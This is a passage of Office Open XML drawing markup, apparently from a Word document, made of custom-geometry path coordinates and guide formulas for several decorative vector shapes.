                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="883"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="879"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="874"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="879"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="879"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="874"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="861"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="848"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="831"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="814"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="779"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="753"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="723"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="705"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="688"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="714"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="740"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="770"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="796"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="792"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="792"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="796"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="805"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="818"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="827"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="840"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="857"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="866"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="866"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="861"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="844"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="827"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="805"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="788"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="766"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="727"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="692"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="645"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="593"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="536"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="480"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="446"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="415"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="385"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="363"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="337"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="333"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114" y="329"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="329"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="329"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="329"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="324"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="311"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="294"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="277"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="246"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="238"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="225"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="212"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="203"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="194"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="199"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="212"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="139" y="233"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="255"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="124" y="272"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="251"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="242"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="233"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="229"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="229"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="233"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="246"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="264"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="281"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="294"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="303"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="307"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="186" y="307"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="243" y="303"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="269" y="307"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="295" y="311"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="357" y="342"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="408" y="372"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="419" y="368"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="424" y="359"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="398" y="320"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="372" y="281"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="362" y="233"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="357" y="190"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="351" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="346" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="336" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="326" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="300" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="284" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="264" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="253" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="253" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="253" y="103"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="264" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="284" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="315" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="310" y="125"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="295" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="284" y="138"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="274" y="138"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="243" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="227" y="116"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="217" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="217" y="73"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="227" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="243" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="264" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="284" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="310" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="331" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="357" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="372" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="382" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="382" y="73"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="382" y="90"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="372" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="377" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="382" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="393" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="398" y="99"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="408" y="86"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="413" y="73"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="439" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="465" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="491" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="517" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="543" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="579" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="605" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="641" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="724" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="806" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="884" y="103"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="925" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="951" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="977" y="103"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="998" y="90"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1003" y="77"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1003" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="998" y="47"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="992" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="982" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="972" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="961" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="935" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="930" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="925" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="925" y="77"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="930" y="86"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="899" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="863" y="73"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="806" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="827" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="842" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="879" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="915" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="956" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="972" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="987" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1013" y="2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87"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8264" y="2919"/>
                                <a:ext cx="1189" cy="394"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 1168 w 1189"/>
                                  <a:gd name="T1" fmla="*/ 4 h 394"/>
                                  <a:gd name="T2" fmla="*/ 1189 w 1189"/>
                                  <a:gd name="T3" fmla="*/ 17 h 394"/>
                                  <a:gd name="T4" fmla="*/ 1054 w 1189"/>
                                  <a:gd name="T5" fmla="*/ 17 h 394"/>
                                  <a:gd name="T6" fmla="*/ 630 w 1189"/>
                                  <a:gd name="T7" fmla="*/ 17 h 394"/>
                                  <a:gd name="T8" fmla="*/ 568 w 1189"/>
                                  <a:gd name="T9" fmla="*/ 17 h 394"/>
                                  <a:gd name="T10" fmla="*/ 563 w 1189"/>
                                  <a:gd name="T11" fmla="*/ 26 h 394"/>
                                  <a:gd name="T12" fmla="*/ 563 w 1189"/>
                                  <a:gd name="T13" fmla="*/ 116 h 394"/>
                                  <a:gd name="T14" fmla="*/ 558 w 1189"/>
                                  <a:gd name="T15" fmla="*/ 121 h 394"/>
                                  <a:gd name="T16" fmla="*/ 434 w 1189"/>
                                  <a:gd name="T17" fmla="*/ 121 h 394"/>
                                  <a:gd name="T18" fmla="*/ 372 w 1189"/>
                                  <a:gd name="T19" fmla="*/ 129 h 394"/>
                                  <a:gd name="T20" fmla="*/ 315 w 1189"/>
                                  <a:gd name="T21" fmla="*/ 138 h 394"/>
                                  <a:gd name="T22" fmla="*/ 258 w 1189"/>
                                  <a:gd name="T23" fmla="*/ 151 h 394"/>
                                  <a:gd name="T24" fmla="*/ 206 w 1189"/>
                                  <a:gd name="T25" fmla="*/ 173 h 394"/>
                                  <a:gd name="T26" fmla="*/ 155 w 1189"/>
                                  <a:gd name="T27" fmla="*/ 199 h 394"/>
                                  <a:gd name="T28" fmla="*/ 108 w 1189"/>
                                  <a:gd name="T29" fmla="*/ 233 h 394"/>
                                  <a:gd name="T30" fmla="*/ 72 w 1189"/>
                                  <a:gd name="T31" fmla="*/ 272 h 394"/>
                                  <a:gd name="T32" fmla="*/ 46 w 1189"/>
                                  <a:gd name="T33" fmla="*/ 311 h 394"/>
                                  <a:gd name="T34" fmla="*/ 5 w 1189"/>
                                  <a:gd name="T35" fmla="*/ 394 h 394"/>
                                  <a:gd name="T36" fmla="*/ 0 w 1189"/>
                                  <a:gd name="T37" fmla="*/ 385 h 394"/>
                                  <a:gd name="T38" fmla="*/ 0 w 1189"/>
                                  <a:gd name="T39" fmla="*/ 372 h 394"/>
                                  <a:gd name="T40" fmla="*/ 5 w 1189"/>
                                  <a:gd name="T41" fmla="*/ 350 h 394"/>
                                  <a:gd name="T42" fmla="*/ 20 w 1189"/>
                                  <a:gd name="T43" fmla="*/ 316 h 394"/>
                                  <a:gd name="T44" fmla="*/ 46 w 1189"/>
                                  <a:gd name="T45" fmla="*/ 281 h 394"/>
                                  <a:gd name="T46" fmla="*/ 72 w 1189"/>
                                  <a:gd name="T47" fmla="*/ 246 h 394"/>
                                  <a:gd name="T48" fmla="*/ 103 w 1189"/>
                                  <a:gd name="T49" fmla="*/ 216 h 394"/>
                                  <a:gd name="T50" fmla="*/ 139 w 1189"/>
                                  <a:gd name="T51" fmla="*/ 190 h 394"/>
                                  <a:gd name="T52" fmla="*/ 181 w 1189"/>
                                  <a:gd name="T53" fmla="*/ 168 h 394"/>
                                  <a:gd name="T54" fmla="*/ 222 w 1189"/>
                                  <a:gd name="T55" fmla="*/ 147 h 394"/>
                                  <a:gd name="T56" fmla="*/ 263 w 1189"/>
                                  <a:gd name="T57" fmla="*/ 134 h 394"/>
                                  <a:gd name="T58" fmla="*/ 346 w 1189"/>
                                  <a:gd name="T59" fmla="*/ 116 h 394"/>
                                  <a:gd name="T60" fmla="*/ 382 w 1189"/>
                                  <a:gd name="T61" fmla="*/ 112 h 394"/>
                                  <a:gd name="T62" fmla="*/ 424 w 1189"/>
                                  <a:gd name="T63" fmla="*/ 108 h 394"/>
                                  <a:gd name="T64" fmla="*/ 537 w 1189"/>
                                  <a:gd name="T65" fmla="*/ 103 h 394"/>
                                  <a:gd name="T66" fmla="*/ 542 w 1189"/>
                                  <a:gd name="T67" fmla="*/ 95 h 394"/>
                                  <a:gd name="T68" fmla="*/ 542 w 1189"/>
                                  <a:gd name="T69" fmla="*/ 0 h 394"/>
                                  <a:gd name="T70" fmla="*/ 1168 w 1189"/>
                                  <a:gd name="T71" fmla="*/ 4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9" h="394">
                                    <a:moveTo>
                                      <a:pt x="1168" y="4"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="1189" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1054" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="630" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="568" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="563" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="563" y="116"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="558" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="434" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="372" y="129"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="315" y="138"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="258" y="151"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="206" y="173"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="199"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="233"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="272"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="311"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="394"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="385"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="372"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="350"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="316"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="281"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="246"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="216"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="139" y="190"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="181" y="168"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="222" y="147"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="263" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="346" y="116"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="382" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="424" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="537" y="103"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="542" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="542" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1168"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88"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7494" y="2936"/>
                                <a:ext cx="25" cy="4"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 25 w 25"/>
                                  <a:gd name="T1" fmla="*/ 0 h 4"/>
                                  <a:gd name="T2" fmla="*/ 10 w 25"/>
                                  <a:gd name="T3" fmla="*/ 4 h 4"/>
                                  <a:gd name="T4" fmla="*/ 0 w 25"/>
                                  <a:gd name="T5" fmla="*/ 4 h 4"/>
                                  <a:gd name="T6" fmla="*/ 5 w 25"/>
                                  <a:gd name="T7" fmla="*/ 0 h 4"/>
                                  <a:gd name="T8" fmla="*/ 10 w 25"/>
                                  <a:gd name="T9" fmla="*/ 0 h 4"/>
                                  <a:gd name="T10" fmla="*/ 25 w 25"/>
                                  <a:gd name="T11" fmla="*/ 0 h 4"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T8" y="T9"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T10" y="T11"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="25" h="4">
                                    <a:moveTo>
                                      <a:pt x="25" y="0"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="2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89"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8279" y="2949"/>
                                <a:ext cx="1225" cy="493"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 1225 w 1225"/>
                                  <a:gd name="T1" fmla="*/ 9 h 493"/>
                                  <a:gd name="T2" fmla="*/ 1210 w 1225"/>
                                  <a:gd name="T3" fmla="*/ 26 h 493"/>
                                  <a:gd name="T4" fmla="*/ 1153 w 1225"/>
                                  <a:gd name="T5" fmla="*/ 30 h 493"/>
                                  <a:gd name="T6" fmla="*/ 610 w 1225"/>
                                  <a:gd name="T7" fmla="*/ 30 h 493"/>
                                  <a:gd name="T8" fmla="*/ 605 w 1225"/>
                                  <a:gd name="T9" fmla="*/ 34 h 493"/>
                                  <a:gd name="T10" fmla="*/ 600 w 1225"/>
                                  <a:gd name="T11" fmla="*/ 138 h 493"/>
                                  <a:gd name="T12" fmla="*/ 465 w 1225"/>
                                  <a:gd name="T13" fmla="*/ 138 h 493"/>
                                  <a:gd name="T14" fmla="*/ 403 w 1225"/>
                                  <a:gd name="T15" fmla="*/ 147 h 493"/>
                                  <a:gd name="T16" fmla="*/ 341 w 1225"/>
                                  <a:gd name="T17" fmla="*/ 151 h 493"/>
                                  <a:gd name="T18" fmla="*/ 279 w 1225"/>
                                  <a:gd name="T19" fmla="*/ 164 h 493"/>
                                  <a:gd name="T20" fmla="*/ 222 w 1225"/>
                                  <a:gd name="T21" fmla="*/ 186 h 493"/>
                                  <a:gd name="T22" fmla="*/ 171 w 1225"/>
                                  <a:gd name="T23" fmla="*/ 212 h 493"/>
                                  <a:gd name="T24" fmla="*/ 150 w 1225"/>
                                  <a:gd name="T25" fmla="*/ 234 h 493"/>
                                  <a:gd name="T26" fmla="*/ 124 w 1225"/>
                                  <a:gd name="T27" fmla="*/ 255 h 493"/>
                                  <a:gd name="T28" fmla="*/ 104 w 1225"/>
                                  <a:gd name="T29" fmla="*/ 281 h 493"/>
                                  <a:gd name="T30" fmla="*/ 83 w 1225"/>
                                  <a:gd name="T31" fmla="*/ 312 h 493"/>
                                  <a:gd name="T32" fmla="*/ 67 w 1225"/>
                                  <a:gd name="T33" fmla="*/ 338 h 493"/>
                                  <a:gd name="T34" fmla="*/ 57 w 1225"/>
                                  <a:gd name="T35" fmla="*/ 368 h 493"/>
                                  <a:gd name="T36" fmla="*/ 42 w 1225"/>
                                  <a:gd name="T37" fmla="*/ 433 h 493"/>
                                  <a:gd name="T38" fmla="*/ 31 w 1225"/>
                                  <a:gd name="T39" fmla="*/ 493 h 493"/>
                                  <a:gd name="T40" fmla="*/ 11 w 1225"/>
                                  <a:gd name="T41" fmla="*/ 493 h 493"/>
                                  <a:gd name="T42" fmla="*/ 5 w 1225"/>
                                  <a:gd name="T43" fmla="*/ 489 h 493"/>
                                  <a:gd name="T44" fmla="*/ 0 w 1225"/>
                                  <a:gd name="T45" fmla="*/ 455 h 493"/>
                                  <a:gd name="T46" fmla="*/ 0 w 1225"/>
                                  <a:gd name="T47" fmla="*/ 424 h 493"/>
                                  <a:gd name="T48" fmla="*/ 5 w 1225"/>
                                  <a:gd name="T49" fmla="*/ 394 h 493"/>
                                  <a:gd name="T50" fmla="*/ 16 w 1225"/>
                                  <a:gd name="T51" fmla="*/ 359 h 493"/>
                                  <a:gd name="T52" fmla="*/ 42 w 1225"/>
                                  <a:gd name="T53" fmla="*/ 299 h 493"/>
                                  <a:gd name="T54" fmla="*/ 78 w 1225"/>
                                  <a:gd name="T55" fmla="*/ 242 h 493"/>
                                  <a:gd name="T56" fmla="*/ 114 w 1225"/>
                                  <a:gd name="T57" fmla="*/ 208 h 493"/>
                                  <a:gd name="T58" fmla="*/ 155 w 1225"/>
                                  <a:gd name="T59" fmla="*/ 182 h 493"/>
                                  <a:gd name="T60" fmla="*/ 197 w 1225"/>
                                  <a:gd name="T61" fmla="*/ 156 h 493"/>
                                  <a:gd name="T62" fmla="*/ 243 w 1225"/>
                                  <a:gd name="T63" fmla="*/ 138 h 493"/>
                                  <a:gd name="T64" fmla="*/ 290 w 1225"/>
                                  <a:gd name="T65" fmla="*/ 121 h 493"/>
                                  <a:gd name="T66" fmla="*/ 341 w 1225"/>
                                  <a:gd name="T67" fmla="*/ 112 h 493"/>
                                  <a:gd name="T68" fmla="*/ 393 w 1225"/>
                                  <a:gd name="T69" fmla="*/ 108 h 493"/>
                                  <a:gd name="T70" fmla="*/ 445 w 1225"/>
                                  <a:gd name="T71" fmla="*/ 108 h 493"/>
                                  <a:gd name="T72" fmla="*/ 502 w 1225"/>
                                  <a:gd name="T73" fmla="*/ 108 h 493"/>
                                  <a:gd name="T74" fmla="*/ 558 w 1225"/>
                                  <a:gd name="T75" fmla="*/ 108 h 493"/>
                                  <a:gd name="T76" fmla="*/ 564 w 1225"/>
                                  <a:gd name="T77" fmla="*/ 108 h 493"/>
                                  <a:gd name="T78" fmla="*/ 569 w 1225"/>
                                  <a:gd name="T79" fmla="*/ 0 h 493"/>
                                  <a:gd name="T80" fmla="*/ 574 w 1225"/>
                                  <a:gd name="T81" fmla="*/ 0 h 493"/>
                                  <a:gd name="T82" fmla="*/ 1210 w 1225"/>
                                  <a:gd name="T83" fmla="*/ 4 h 493"/>
                                  <a:gd name="T84" fmla="*/ 1225 w 1225"/>
